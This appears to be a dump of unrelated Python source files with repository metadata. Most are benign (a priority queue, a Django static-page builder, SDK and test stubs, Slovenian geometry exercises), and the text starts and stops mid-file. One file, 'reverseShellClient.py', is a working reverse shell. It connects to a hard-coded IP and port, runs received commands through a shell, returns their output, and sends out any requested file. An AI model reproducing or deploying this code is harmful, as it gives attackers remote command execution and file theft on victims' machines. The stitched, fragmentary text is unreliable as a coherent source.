ฅๅ ไธญ"""
heapq.heappush(self._queue, (-priority, self._index, item))
self._index += 1
def pop(self):
return heapq.heappop(self._queue)[-1]
class Item():
"""ๆๅ
ฅๅ
็ด """
def __init__(self, name):
self.name = name
def __repr__(self):
return 'Item({!r})'.format(self.name)
# main
q = PriorityQueue()
q.push(Item('neo'), 1)
q.push(Item('jack'), 2)
q.push(Item('sister'), 4)
q.push(Item('me'), 4)
print q.pop()
| [
"[email protected]"
] | |
1bf7eaa168fb2f7be9f2f08b4db4ea83c94a4ac3 | 772c3a28ee43665420ba53db4df5d96739884918 | /django/trail_threshold_variability/management/commands/buildstatic_ttv.py | 234a08aaf2286807ef5f59b56f35869d19ebb12f | [] | no_license | hmslincs/hmslincs | 4af60b3622750688e9dfd087bcb53daf9caf5c06 | a94a832cc2d9f963c4597eafd6593cd332bfe433 | refs/heads/master | 2021-04-15T05:44:37.226124 | 2020-08-28T16:58:05 | 2020-08-28T16:58:05 | 5,276,090 | 8 | 5 | null | 2020-07-30T18:50:44 | 2012-08-02T18:20:25 | JavaScript | UTF-8 | Python | false | false | 9,895 | py | # -*- coding: utf-8 -*-
import sys
import os
import re
import codecs
import argparse
import itertools
import unipath
import csv
import django.conf
from django.template.loader import render_to_string
from django.core.management.base import BaseCommand, CommandError
from django.contrib.flatpages.models import FlatPage
from django.contrib.sites.models import Site
from optparse import make_option
table = [{'name': u'Modulation of DISC activity (k)',
'schematic_page': 1,
'treatment_map': [('TRAIL', '', 1), ('Mapatumumab', '', 52),
('Apomab', '', 90), ('Mapatumumab', 'anti-Fc', 68),
('Apomab', 'anti-Fc', 103),
('TRAIL', 'FLIP-L overexpression', 124),
('TRAIL', 'FLIP-S overexpression', 131)],
'treatments': [], 'num_columns': 0, 'num_dose_columns': 0,
'num_padding_columns': 0},
{'name': u'Modulation of activation timing (ฯ)',
'schematic_page': 3,
'treatment_map': [('TRAIL', 'Bortezomib', 27),
('Mapatumumab', 'Bortezomib', 84),
('Mapatumumab', 'Bortezomib + anti-Fc', 87),
('Apomab', 'Bortezomib', 116),
('Apomab', 'Bortezomib + anti-Fc', 120),
('TRAIL', 'Bortezomib + FLIP-L overexpression', 138),
('TRAIL', 'Bortezomib + FLIP-S overexpression', 141)],
'treatments': [], 'num_columns': 0, 'num_dose_columns': 0,
'num_padding_columns': 0},
{'name': u'Modulation of the cellular apoptotic threshold (ฮธ)',
'schematic_page': 2,
'treatment_map': [('TRAIL', 'ABT-263', 40),
('TRAIL', 'Bcl-2 overexpression', 144),
('TRAIL', 'ABT-263 + Bcl-2 overexpression', 158),
('TRAIL', 'Bcl-XL overexpression', 149),
('TRAIL', 'ABT-263 + Bcl-XL overexpression', 160)],
'treatments': [], 'num_columns': 0, 'num_dose_columns': 0,
'num_padding_columns': 0}]
data_filenames = ['Aggregate_SingleCell_results.tsv', 'All_SingleCell_data.zip',
'Results_other_lines.zip', 'scripts.zip']
empty_treatment = dict.fromkeys(['name', 'unit', 'doses'])
popup_target_width = 939 * 2
schematic_target_width = 230 * 2
class Command(BaseCommand):
help = 'Builds the static assets and html chunks'
option_list = BaseCommand.option_list + (
make_option('-n', '--no-images', action='store_true', default=False,
help='Skip building images'),
make_option('-d', '--no-data', action='store_true', default=False,
help='Skip building data download files'),
make_option('-r', '--resource-path',
default=('/home/jmuhlich/Dropbox (HMS-LSP)/'
'Roux Hafner TRAIL_DISC_paper/website/'),
help=('Path to resource files (contains "figures" and '
'"data" directories)'))
)
def handle(self, *args, **options):
url = '/explore/trail-threshold-variability/'
content = build_static(options)
page, created = FlatPage.objects.get_or_create(url=url)
page.title = ('Fractional killing arises from cell-to-cell '
'variability in overcoming a caspase activity threshold')
page.content = content
page.template_name = 'trail_threshold_variability/base.html'
page.sites.clear()
page.sites.add(Site.objects.get_current())
page.save()
def build_static(options):
app_path = unipath.Path(__file__).absolute().ancestor(3)
static_path = app_path.child('static', 'trail_threshold_variability')
generated_path = static_path.child('g')
generated_path.mkdir()
resource_path = unipath.Path(options['resource_path'])
img_src_path = resource_path.child('figures')
popup_dest_path = generated_path.child('popup')
schematic_dest_path = generated_path.child('schematic')
data_src_path = resource_path.child('data')
data_dest_path = generated_path.child('data')
treatment_reverse_map = {}
for s_idx, section in enumerate(table):
tmap = section['treatment_map']
treatments = section['treatments'] = [empty_treatment] * len(tmap)
for t_idx, (t_main, t_other, dataset_number) in enumerate(tmap):
treatment_reverse_map[dataset_number] = s_idx, t_idx
dose_img_paths = {}
for p in img_src_path.child('doses').listdir():
match = re.match('(\d{3}).*\.jpg$', p.name)
if match:
dataset_idx = match.group(1).lstrip('0')
# Sanity check: should never see two images for the same dataset.
assert dataset_idx not in dose_img_paths
dose_img_paths[dataset_idx] = p
data_file = open(resource_path.child('datasets_results_internal.tsv'))
groups = itertools.groupby(
csv.reader(data_file, delimiter='\t'),
lambda x: re.match(r'\d', x[0]) is None)
groups = (list(g) for k, g in groups)
for headers, values in itertools.izip(groups, groups):
treatment_row, header_row = headers
s_idx, t_idx = treatment_reverse_map[int(values[0][0])]
values = [dict(zip(header_row, v)) for v in values]
values = [v for v in values if v['Dataset'] in dose_img_paths]
t_main, t_other = table[s_idx]['treatment_map'][t_idx][0:2]
unit = re.search(r'(?<=\()[^)]+', header_row[2]).group()
# FIXME Factor out repeated reference to dose_img_paths[v['Dataset']].
doses = [{'amount': v['Dose'],
'img_filename': dose_img_paths[v['Dataset']].name,
'img_path': dose_img_paths[v['Dataset']],
'id': as_css_identifier(dose_img_paths[v['Dataset']].stem)}
for v in values if v['Dataset'] in dose_img_paths]
table[s_idx]['treatments'][t_idx] = {'name_main': t_main,
'name_other': t_other,
'unit': unit, 'doses': doses}
max_dose_columns = max(len(treatment['doses']) for section in table
for treatment in section['treatments'])
for section in table:
n = max(len(treatment['doses']) for treatment in section['treatments'])
section['num_columns'] = n + 1
section['num_dose_columns'] = n
section['num_padding_columns'] = max_dose_columns - n
doses = [dose for section in table for treatment in section['treatments']
for dose in treatment['doses']]
# Sanity check: make sure there are no colliding dose ids. (Yes this code is
# performance-naive but the list size is trivial.)
dose_ids = [dose['id'] for dose in doses]
assert len(dose_ids) == len(set(dose_ids))
# Assemble data for template and render html.
data = {'table': table }
content = render_to_string('trail_threshold_variability/index.html', data)
if not options['no_images']:
# Resize and copy popup images.
# NOTE: This import is here because wand is broken on orchestra debian
# (binary libMagickWand.so is too old) and won't even import. We can run
# the image generation elsewhere and copy the images in, but the HTML
# generation needs to run here since it writes to the DB. Putting the
# import here allows the -n option to prevent the crash on import.
import wand.image
popup_dest_path.mkdir()
for dose in doses:
dest_path = popup_dest_path.child(dose['img_filename'])
with wand.image.Image(filename=dose['img_path']) as img, \
open(dest_path, 'w') as f:
scale = float(popup_target_width) / img.width
target_size = [int(round(d * scale)) for d in img.size]
img.resize(*target_size, blur=1.5)
img.compression_quality = 20
img.format = 'JPEG'
img.save(file=f)
dest_path.chmod(0o644)
# Extract and copy schematic images.
schematic_dest_path.mkdir()
schematic_path = img_src_path.child('schematics', 'Trajectories_schematics.pdf')
with wand.image.Image(filename=schematic_path, resolution=500) as img:
for section in table:
page_number = section['schematic_page']
page = wand.image.Image(image=img.sequence[page_number])
page.alpha_channel = False
scale = float(schematic_target_width) / page.width
target_size = [int(round(d * scale)) for d in page.size]
page.resize(*target_size)
page.compression_quality = 100
page.format = 'JPEG'
filename = '{}.jpg'.format(page_number)
dest_path = schematic_dest_path.child(filename)
page.save(filename=dest_path)
dest_path.chmod(0o644)
if not options['no_data']:
# Copy data download files.
data_dest_path.mkdir(parents=True)
for filename in data_filenames:
src_path = data_src_path.child(filename)
dest_path = data_dest_path.child(filename)
src_path.copy(dest_path)
dest_path.chmod(0o644)
return content
def as_css_identifier(s):
"""
Sanitize a string for use as a CSS identifier (e.g. a class or id).
Note that we don't remove leading hyphens, nor do we avoid introducing new
ones. If they are a possibility with your data, you should apply a prefix to
the values returned from this function to sidestep the issue entirely.
"""
return re.sub(r'[^a-z0-9-]', '-', s, flags=re.IGNORECASE)
| [
"[email protected]"
] | |
292162c5cafc53d1a12dc03d491b24cf96e78e25 | 1254f553b70353c6d4ee85c2497db23ebb7903f2 | /test/test_component_history_dto.py | 4355b4f43a4156efe6b2297894e9425535b89a0a | [
"Apache-2.0"
] | permissive | tspannhw/nifi-python-swagger-client | 05137bd2ad36706f323621ab2510abb124ce9bf9 | 0cc73d31a1143c3fa73237fd3d4702a7c3c5b3b1 | refs/heads/master | 2021-01-20T02:24:36.484855 | 2017-08-24T12:52:46 | 2017-08-24T12:52:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,377 | py | # coding: utf-8
"""
NiFi Rest Api
The Rest Api provides programmatic access to command and control a NiFi instance in real time. Start and stop processors, monitor queues, query provenance data, and more. Each endpoint below includes a description, definitions of the expected input and output, potential response codes, and the authorizations required to invoke each service.
OpenAPI spec version: 1.2.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import swagger_client
from swagger_client.rest import ApiException
from swagger_client.models.component_history_dto import ComponentHistoryDTO
class TestComponentHistoryDTO(unittest.TestCase):
""" ComponentHistoryDTO unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testComponentHistoryDTO(self):
"""
Test ComponentHistoryDTO
"""
# FIXME: construct object with mandatory attributes with example values
#model = swagger_client.models.component_history_dto.ComponentHistoryDTO()
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
6da0bcecf30603f283acccf783ffabe67f975332 | e3402d37d5a9fb7ee3c3c73e95732d778f48b6fb | /com/kute/algorithms/__init__.py | fda4ab1360693493004b434ada15fd4d10c6bff4 | [] | no_license | kute/purepythontest | 51d3186ddaa2f1142382768380b776a1ba9469ed | 2baa1746a34cefe0be0e5f59be21450d330491a7 | refs/heads/master | 2020-04-12T06:20:14.957566 | 2018-03-18T07:03:22 | 2018-03-18T07:03:22 | 65,204,109 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 163 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# __author__ = 'kute'
# __mtime__ = '16/5/24 21:40'
def main():
pass
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
484fb1aa20f41b92a393cd858ddb44178f0c42cf | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2482/60708/267104.py | aad8d1301873e9edbe9c748d5974ac162ce03841 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 610 | py | N=int(input())
for n in range(0,N):
x=int(input())
y=int(input())
result=list(str(x/y))
a=""#ๅฐๆฐ็นๅ
b="."
for i in range(0,len(result)):
if(result[0])=='.':
a=a+result[0]
result.pop(0)
b=''.join(result)[0:]
break
else:
a=a+result[0]
result.pop(0)
if len(b)<16:
print(a,end='')
print(b,end='')
else:
for i in range(1,16+1):
if b[0:i]==b[i:i+i]:
b='('+b[0:i]+'๏ผ'
break
print(a,end='')
print(b,end='') | [
"[email protected]"
] | |
742e6ea7de50bcac003bc3d80347733854493805 | bc54edd6c2aec23ccfe36011bae16eacc1598467 | /simscale_sdk/models/one_of_velocity_inlet_bc_net_radiative_heat_flux.py | b26f7a002aaa6f9893e3aa80e77d6c8f7b0d3f5c | [
"MIT"
] | permissive | SimScaleGmbH/simscale-python-sdk | 4d9538d5efcadae718f12504fb2c7051bbe4b712 | 6fe410d676bf53df13c461cb0b3504278490a9bb | refs/heads/master | 2023-08-17T03:30:50.891887 | 2023-08-14T08:09:36 | 2023-08-14T08:09:36 | 331,949,105 | 17 | 5 | null | null | null | null | UTF-8 | Python | false | false | 6,040 | py | # coding: utf-8
"""
SimScale API
The version of the OpenAPI document: 0.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from simscale_sdk.configuration import Configuration
class OneOfVelocityInletBCNetRadiativeHeatFlux(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'type': 'str',
'emissivity': 'DimensionalDimensionless',
'radiative_source_value': 'DimensionalHeatFlux'
}
attribute_map = {
'type': 'type',
'emissivity': 'emissivity',
'radiative_source_value': 'radiativeSourceValue'
}
discriminator_value_class_map = {
'GREYBODY_DIFFUSIVE': 'GreybodyDiffusiveRSBC',
'OPEN_WINDOW': 'OpenWindowRSBC'
}
def __init__(self, type='OPEN_WINDOW', emissivity=None, radiative_source_value=None, local_vars_configuration=None): # noqa: E501
"""OneOfVelocityInletBCNetRadiativeHeatFlux - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._type = None
self._emissivity = None
self._radiative_source_value = None
self.discriminator = 'type'
self.type = type
if emissivity is not None:
self.emissivity = emissivity
if radiative_source_value is not None:
self.radiative_source_value = radiative_source_value
@property
def type(self):
"""Gets the type of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
Schema name: OpenWindowRSBC # noqa: E501
:return: The type of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this OneOfVelocityInletBCNetRadiativeHeatFlux.
Schema name: OpenWindowRSBC # noqa: E501
:param type: The type of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and type is None: # noqa: E501
raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501
self._type = type
@property
def emissivity(self):
"""Gets the emissivity of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:return: The emissivity of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:rtype: DimensionalDimensionless
"""
return self._emissivity
@emissivity.setter
def emissivity(self, emissivity):
"""Sets the emissivity of this OneOfVelocityInletBCNetRadiativeHeatFlux.
:param emissivity: The emissivity of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:type: DimensionalDimensionless
"""
self._emissivity = emissivity
@property
def radiative_source_value(self):
"""Gets the radiative_source_value of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:return: The radiative_source_value of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:rtype: DimensionalHeatFlux
"""
return self._radiative_source_value
@radiative_source_value.setter
def radiative_source_value(self, radiative_source_value):
"""Sets the radiative_source_value of this OneOfVelocityInletBCNetRadiativeHeatFlux.
:param radiative_source_value: The radiative_source_value of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:type: DimensionalHeatFlux
"""
self._radiative_source_value = radiative_source_value
def get_real_child_model(self, data):
"""Returns the real base class specified by the discriminator"""
discriminator_key = self.attribute_map[self.discriminator]
discriminator_value = data[discriminator_key]
return self.discriminator_value_class_map.get(discriminator_value)
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, OneOfVelocityInletBCNetRadiativeHeatFlux):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, OneOfVelocityInletBCNetRadiativeHeatFlux):
return True
return self.to_dict() != other.to_dict()
| [
"simscale"
] | simscale |
adacebb3ba78137de88beae5fab192ad6c360797 | 571ebcf06cc01309231a97a963f531f8dd90963d | /Hacking Scripts/reverseShellClient.py | 8d0e051c123e16c061dada96f83f7e7f1da281dc | [] | no_license | SV-ZeroOne/Python-Projects | 3da0ec813e2764d5a3cd8f1d9825e698e368a84e | 8820c346e0dde3b4023ce400cb722d08c1b4c52e | refs/heads/master | 2023-08-19T20:43:07.294205 | 2021-10-16T11:57:33 | 2021-10-16T11:57:33 | 95,302,475 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 804 | py | import socket
import subprocess
import os
def transfer(s, path):
if os.path.exists(path):
f = open(path, 'rb')
packet = f.read(1024)
while len(packet) > 0:
s.send(packet)
packet = f.read(1024)
s.send('DONE'.encode())
else:
s.send('File not found'.encode())
def connect():
s = socket.socket()
s.connect(("192.168.100.137",8080))
while True:
command = s.recv(1024)
if 'terminate' in command.decode():
s.close()
break
elif 'grab' in command.decode():
grab, path = command.decode().split("*")
try:
transfer(s, path)
except:
pass
else:
CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send(CMD.stdout.read())
s.send(CMD.stderr.read())
def main():
connect()
main()
| [
"[email protected]"
] | |
5fef595807aff3c1ec3c72433953ec333d323341 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_4/75.py | 8d4a612aa342b0b8858f654fcd10500e495a8f9b | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | import sys
f = open(sys.argv[1])
o = open(sys.argv[1].split('.')[0] + '.out', 'w')
nCases = int(f.readline().strip())
for case in range(nCases):
dimension = int(f.readline())
v1 = map(int, f.readline().strip().split())
v2 = map(int, f.readline().strip().split())
v1.sort()
v2.sort()
v2.reverse()
sum = 0
for x,y in zip(v1, v2):
sum += x*y
o.write('Case #%d: %d\n' % (case + 1, sum))
| [
"[email protected]"
] | |
a3f35d160cbff7a6e359c74755f53d3753b84b49 | 99c4d4a6592fded0e8e59652484ab226ac0bd38c | /code/batch-1/dn4/M-105.py | 72c9b3399cabf41ee7dae145d599b123516d8116 | [] | no_license | benquick123/code-profiling | 23e9aa5aecb91753e2f1fecdc3f6d62049a990d5 | 0d496d649247776d121683d10019ec2a7cba574c | refs/heads/master | 2021-10-08T02:53:50.107036 | 2018-12-06T22:56:38 | 2018-12-06T22:56:38 | 126,011,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,446 | py | '''
Seznam krajev, iz prejลกnje naloge. Uporabno, ฤe ni testov.
kraji = [
('Breลพice', 68.66, 7.04), ('Lenart', 85.20, 78.75), ('Rateฤe', -65.04, 70.04),
('Ljutomer', 111.26, 71.82), ('Rogaลกka Slatina', 71.00, 42.00), ('Ribnica', 7.10, -10.50),
('Dutovlje', -56.80, -6.93), ('Lokve', -57.94, 19.32), ('Vinica', 43.81, -38.43),
('Brtonigla', -71.00, -47.25), ('Kanal', -71.00, 26.25), ('ฤrnomelj', 39.05, -27.93),
('Trbovlje', 29.61, 35.07), ('Beltinci', 114.81, 80.54), ('Domลพale', -2.34, 31.50),
('Hodoลก', 120.70, 105.00), ('ล kofja Loka', -23.64, 35.07), ('Velike Laลกฤe', 0.00, 0.00),
('Velenje', 33.16, 54.29), ('ล oลกtanj', 29.61, 57.75), ('Laลกko', 42.60, 33.29),
('Postojna', -29.54, -5.25), ('Ilirska Bistrica', -27.19, -27.93),
('Radenci', 100.61, 84.00), ('ฤrna', 15.41, 66.57), ('Radeฤe', 39.05, 24.57),
('Vitanje', 47.36, 57.75), ('Bled', -37.84, 56.07), ('Tolmin', -63.90, 36.75),
('Miren', -72.14, 7.04), ('Ptuj', 87.61, 61.32), ('Gornja Radgona', 97.06, 89.25),
('Plave', -73.34, 21.00), ('Novo mesto', 37.91, -3.47), ('Bovec', -76.89, 52.50),
('Nova Gorica', -69.79, 12.29), ('Krลกko', 60.35, 14.07), ('Cerknica', -18.89, -3.47),
('Slovenska Bistrica', 66.31, 57.75), ('Anhovo', -72.14, 22.78), ('Ormoลพ', 107.71, 61.32),
('ล kofije', -59.14, -27.93), ('ฤepovan', -60.35, 22.78), ('Murska Sobota', 108.91, 87.57),
('Ljubljana', -8.24, 22.78), ('Idrija', -43.74, 17.54), ('Radlje ob Dravi', 41.46, 82.32),
('ลฝalec', 37.91, 43.79), ('Mojstrana', -49.70, 64.79),
('Log pod Mangartom', -73.34, 59.54), ('Podkoren', -62.69, 70.04),
('Koฤevje', 16.61, -21.00), ('Soฤa', -69.79, 52.50), ('Ajdovลกฤina', -53.25, 5.25),
('Bohinjska Bistrica', -48.49, 47.25), ('Trลพiฤ', -22.44, 56.07), ('Piran', -75.69, -31.50),
('Kranj', -20.09, 43.79), ('Kranjska Gora', -60.35, 68.25), ('Izola', -68.59, -31.50),
('Radovljica', -31.95, 54.29), ('Gornji Grad', 13.06, 49.03), ('ล entjur', 54.46, 40.32),
('Koper', -63.90, -29.72), ('Celje', 45.01, 42.00), ('Mislinja', 42.60, 66.57),
('Metlika', 48.56, -19.21), ('ลฝaga', -81.65, 49.03), ('Komen', -63.90, -1.68),
('ลฝuลพemberk', 21.30, 0.00), ('Pesnica', 74.55, 80.54), ('Vrhnika', -23.64, 14.07),
('Dravograd', 28.40, 78.75), ('Kamnik', -1.14, 40.32), ('Jesenice', -40.19, 64.79),
('Kobarid', -74.55, 43.79), ('Portoroลพ', -73.34, -33.18), ('Muta', 37.91, 82.32),
('Seลพana', -54.39, -13.96), ('Vipava', -47.29, 1.79), ('Maribor', 72.21, 75.28),
('Slovenj Gradec', 31.95, 71.82), ('Litija', 14.20, 22.78), ('Na Logu', -62.69, 57.75),
('Stara Fuลพina', -52.04, 47.25), ('Motovun', -56.80, -52.50), ('Pragersko', 73.41, 57.75),
('Most na Soฤi', -63.90, 33.29), ('Brestanica', 60.35, 15.75),
('Savudrija', -80.44, -34.96), ('Sodraลพica', 0.00, -6.93),
]
'''
from math import sqrt
from random import randint
'''
Ogrevalne naloge
'''
#1. ogrevalna
def koordinate(ime, kraji):
#vrne koordinate iskanega kraja
for kraj, x, y in kraji:
if kraj == ime:
return x, y
else:
return
#2. ogrevalna
def razdalja_koordinat(x1, y1, x2, y2):
return sqrt((x2-x1)**2 + (y2-y1)**2)
#3. ogrevalna
def razdalja(ime1, ime2, kraji):
x1, y1 = koordinate(ime1, kraji)
x2, y2 = koordinate(ime2, kraji)
return razdalja_koordinat(x1, y1, x2, y2)
#print(razdalja("Ljubljana", "Kranj", kraji))
'''
Obvezne naloge
'''
#1. obvezna
def v_dometu(ime, domet, kraji):
container = []
x1, y1 = koordinate(ime, kraji)
for ime_k, x, y in kraji:
if ime_k != ime:
r = razdalja_koordinat(x1, y1, x, y)
if r <= domet:
container.append(ime_k)
return container
#2. obvezna
def najbolj_oddaljeni(ime, imena, kraji):
x1, y1 = koordinate(ime, kraji)
x2, y2 = koordinate(imena[0], kraji)
najvecja_razdalja = razdalja_koordinat(x1, y1, x2, y2)
ime_kraja = imena[0]
for i in imena:
x2, y2 = koordinate(i, kraji)
r = razdalja_koordinat(x1, y1, x2, y2)
if r > najvecja_razdalja:
najvecja_razdalja = r
ime_kraja = i
return ime_kraja
#3. obvezna
def zalijemo(ime, domet, kraji):
return najbolj_oddaljeni(ime, v_dometu(ime, domet, kraji), kraji)
#print(zalijemo("Kranj", 30, kraji))
'''
Dodatne naloge
'''
#1. dodatna
def presek(s1, s2):
container = []
for i in s1:
if i in s2:
if i not in container:
container.append(i)
return container
def ran(low, high, amount):
container = []
for i in range(0, amount):
container.append(randint(low, high))
return container
s1 = ran(0, 10, 10)
s2 = ran(0, 10, 10)
#print(presek(s1, s2))
#2. dodatna
def skupno_zalivanje(ime1, ime2, domet, kraji):
x1, y1 = koordinate(ime1, kraji)
x2, y2 = koordinate(ime2, kraji)
container = []
for ime, x, y in kraji:
r1 = razdalja_koordinat(x1, y1, x, y)
r2 = razdalja_koordinat(x2, y2, x, y)
if r1 < domet and r2 < domet:
container.append(ime)
return container
#print(skupno_zalivanje("Ljubljana", "Bled", 30, kraji))
import unittest
class TestKraji(unittest.TestCase):
vsi_kraji = [
('Breลพice', 68.66, 7.04),
('Lenart', 85.20, 78.75),
('Rateฤe', -65.04, 70.04),
('Ljutomer', 111.26, 71.82),
('Rogaลกka Slatina', 71.00, 42.00),
('Ribnica', 7.10, -10.50),
('Dutovlje', -56.80, -6.93),
('Lokve', -57.94, 19.32),
('Vinica', 43.81, -38.43),
('Brtonigla', -71.00, -47.25),
('Kanal', -71.00, 26.25),
('ฤrnomelj', 39.05, -27.93),
('Trbovlje', 29.61, 35.07),
('Beltinci', 114.81, 80.54),
('Domลพale', -2.34, 31.50),
('Hodoลก', 120.70, 105.00),
('ล kofja Loka', -23.64, 35.07),
('Velike Laลกฤe', 0.00, 0.00),
('Velenje', 33.16, 54.29),
('ล oลกtanj', 29.61, 57.75),
('Laลกko', 42.60, 33.29),
('Postojna', -29.54, -5.25),
('Ilirska Bistrica', -27.19, -27.93),
('Radenci', 100.61, 84.00),
('ฤrna', 15.41, 66.57),
('Radeฤe', 39.05, 24.57),
('Vitanje', 47.36, 57.75),
('Bled', -37.84, 56.07),
('Tolmin', -63.90, 36.75),
('Miren', -72.14, 7.04),
('Ptuj', 87.61, 61.32),
('Gornja Radgona', 97.06, 89.25),
('Plave', -73.34, 21.00),
('Novo mesto', 37.91, -3.47),
('Bovec', -76.89, 52.50),
('Nova Gorica', -69.79, 12.29),
('Krลกko', 60.35, 14.07),
('Cerknica', -18.89, -3.47),
('Slovenska Bistrica', 66.31, 57.75),
('Anhovo', -72.14, 22.78),
('Ormoลพ', 107.71, 61.32),
('ล kofije', -59.14, -27.93),
('ฤepovan', -60.35, 22.78),
('Murska Sobota', 108.91, 87.57),
('Ljubljana', -8.24, 22.78),
('Idrija', -43.74, 17.54),
('Radlje ob Dravi', 41.46, 82.32),
('ลฝalec', 37.91, 43.79),
('Mojstrana', -49.70, 64.79),
('Log pod Mangartom', -73.34, 59.54),
('Podkoren', -62.69, 70.04),
('Koฤevje', 16.61, -21.00),
('Soฤa', -69.79, 52.50),
('Ajdovลกฤina', -53.25, 5.25),
('Bohinjska Bistrica', -48.49, 47.25),
('Trลพiฤ', -22.44, 56.07),
('Piran', -75.69, -31.50),
('Kranj', -20.09, 43.79),
('Kranjska Gora', -60.35, 68.25),
('Izola', -68.59, -31.50),
('Radovljica', -31.95, 54.29),
('Gornji Grad', 13.06, 49.03),
('ล entjur', 54.46, 40.32),
('Koper', -63.90, -29.72),
('Celje', 45.01, 42.00),
('Mislinja', 42.60, 66.57),
('Metlika', 48.56, -19.21),
('ลฝaga', -81.65, 49.03),
('Komen', -63.90, -1.68),
('ลฝuลพemberk', 21.30, 0.00),
('Pesnica', 74.55, 80.54),
('Vrhnika', -23.64, 14.07),
('Dravograd', 28.40, 78.75),
('Kamnik', -1.14, 40.32),
('Jesenice', -40.19, 64.79),
('Kobarid', -74.55, 43.79),
('Portoroลพ', -73.34, -33.18),
('Muta', 37.91, 82.32),
('Seลพana', -54.39, -13.96),
('Vipava', -47.29, 1.79),
('Maribor', 72.21, 75.28),
('Slovenj Gradec', 31.95, 71.82),
('Litija', 14.20, 22.78),
('Na Logu', -62.69, 57.75),
('Stara Fuลพina', -52.04, 47.25),
('Motovun', -56.80, -52.50),
('Pragersko', 73.41, 57.75),
('Most na Soฤi', -63.90, 33.29),
('Brestanica', 60.35, 15.75),
('Savudrija', -80.44, -34.96),
('Sodraลพica', 0.00, -6.93),
]
class CountCalls:
def __init__(self, f):
self.f = f
self.call_count = 0
def __call__(self, *args, **kwargs):
self.call_count += 1
return self.f(*args, **kwargs)
@classmethod
def setUpClass(cls):
global koordinate, razdalja_koordinat
try:
koordinate = cls.CountCalls(koordinate)
except:
pass
try:
razdalja_koordinat = cls.CountCalls(razdalja_koordinat)
except:
pass
def test_1_koordinate(self):
kraji = [
('Breลพice', 68.66, 7.04),
('Lenart', 85.20, 78.75),
('Rateฤe', -65.04, 70.04),
('Ljutomer', 111.26, 71.82)
]
self.assertEqual(koordinate("Breลพice", kraji), (68.66, 7.04))
self.assertEqual(koordinate("Lenart", kraji), (85.20, 78.75))
self.assertEqual(koordinate("Rateฤe", kraji), (-65.04, 70.04))
self.assertEqual(koordinate("Ljutomer", kraji), (111.26, 71.82))
self.assertIsNone(koordinate("Ljubljana", kraji))
kraji = [('Breลพice', 68.66, 7.04)]
self.assertEqual(koordinate("Breลพice", kraji), (68.66, 7.04))
self.assertIsNone(koordinate("Lenart", kraji))
kraji = []
self.assertIsNone(koordinate("Breลพice", kraji))
def test_1_range_len(self):
class NoGetItem(list):
def __getitem__(*x):
raise IndexError("Nauฤi se (pravilno) uporabljati zanko for!")
kraji = NoGetItem([('Breลพice', 68.66, 7.04), ('Lenart', 85.20, 78.75),
('Rateฤe', -65.04, 70.04)])
self.assertEqual(koordinate("Breลพice", kraji), (68.66, 7.04))
self.assertEqual(koordinate("Lenart", kraji), (85.20, 78.75))
self.assertEqual(koordinate("Rateฤe", kraji), (-65.04, 70.04))
self.assertIsNone(koordinate("Ljubljana", kraji))
def test_2_razdalja_koordinat(self):
